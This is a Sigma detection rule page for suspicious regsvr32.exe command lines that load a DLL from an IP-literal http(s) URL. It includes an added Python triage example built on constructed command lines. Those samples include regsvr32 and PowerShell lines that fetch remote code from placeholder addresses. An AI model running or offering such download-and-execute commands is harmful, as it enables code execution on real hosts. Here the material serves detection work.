Potentially Suspicious Regsvr32 HTTP IP Pattern

Sigma Rules

Summary
This detection rule identifies potentially suspicious use of the Windows executable regsvr32.exe, which is commonly used to register and unregister DLLs. It focuses on invocations in which regsvr32 is pointed at a DLL hosted on a remote location identified only by an IP address rather than a host name. Such behavior can indicate an attempt to download a malicious or unauthorized library for execution on the target system.

The rule matches command-line arguments in which an http:// or https:// prefix is followed directly by a digit, which serves as a cheap proxy for a bare IP address. Registered Windows processes should not normally pull resources from direct IP links, so a match is a flag for further investigation rather than a verdict on its own.

False positives are noted for non-malicious cases where a domain name begins with a digit, such as legitimate software downloads from such hosts.
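The following is an added example, not part of this rule page or the Sigma project, showing the digit-after-scheme heuristic described above applied to a few constructed process command lines, together with a stricter IPv4-literal check a triage analyst might layer on top to separate true IP-literal downloads from the digit-leading-domain false positive the summary mentions. The sample command lines, the host names and the 192.0.2.x / 198.51.100.x addresses are all constructed (RFC 5737 documentation ranges); the rule logic is an assumption modelled on the summary, not the published rule text.

```python
import re

# Constructed process-creation command lines for illustration only (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r"regsvr32.exe /s /i:http://192.0.2.10/x.dll",                     # IP-literal host
    r"regsvr32 /s https://198.51.100.7:8443/x.dll",                    # IP-literal host with port
    r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll",             # local DLL, benign
    r"regsvr32.exe /s /i:http://1vendor.example.com/x.dll",            # hypothetical digit-leading domain
    r"powershell.exe -c Invoke-WebRequest http://192.0.2.10/a",        # not regsvr32 at all
]

# The rule-style heuristic from the summary: regsvr32 in the command line and an
# http:// or https:// prefix followed directly by a digit.
HTTP_DIGIT = re.compile(r"https?://\d", re.IGNORECASE)


def rule_matches(cmdline: str) -> bool:
    """True when the command line would trigger the digit-after-scheme heuristic."""
    return "regsvr32" in cmdline.lower() and HTTP_DIGIT.search(cmdline) is not None


# Triage refinement (assumption, not part of the rule): require a full dotted-quad
# IPv4 host, optionally followed by a port, then a path separator, whitespace or end.
IPV4_HOST = re.compile(
    r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:[/\s]|$)", re.IGNORECASE
)


def is_ip_literal_url(cmdline: str) -> bool:
    """True when the URL host is a bare IPv4 literal rather than a digit-leading name."""
    return IPV4_HOST.search(cmdline) is not None


def triage(cmdlines):
    """Return (command line, classification) for every line the rule fires on."""
    hits = []
    for line in cmdlines:
        if not rule_matches(line):
            continue
        label = "ip-literal" if is_ip_literal_url(line) else "digit-leading-host"
        hits.append((line, label))
    return hits


if __name__ == "__main__":
    for line, label in triage(SAMPLE_COMMAND_LINES):
        print(f"{label:20} {line}")
```

The fourth sample line shows the documented false positive: the heuristic fires because the host name starts with a digit, while the stricter IPv4 check leaves it labelled as digit-leading-host so an analyst can deprioritize it without loosening the rule itself.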
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
Created: 2022-01-11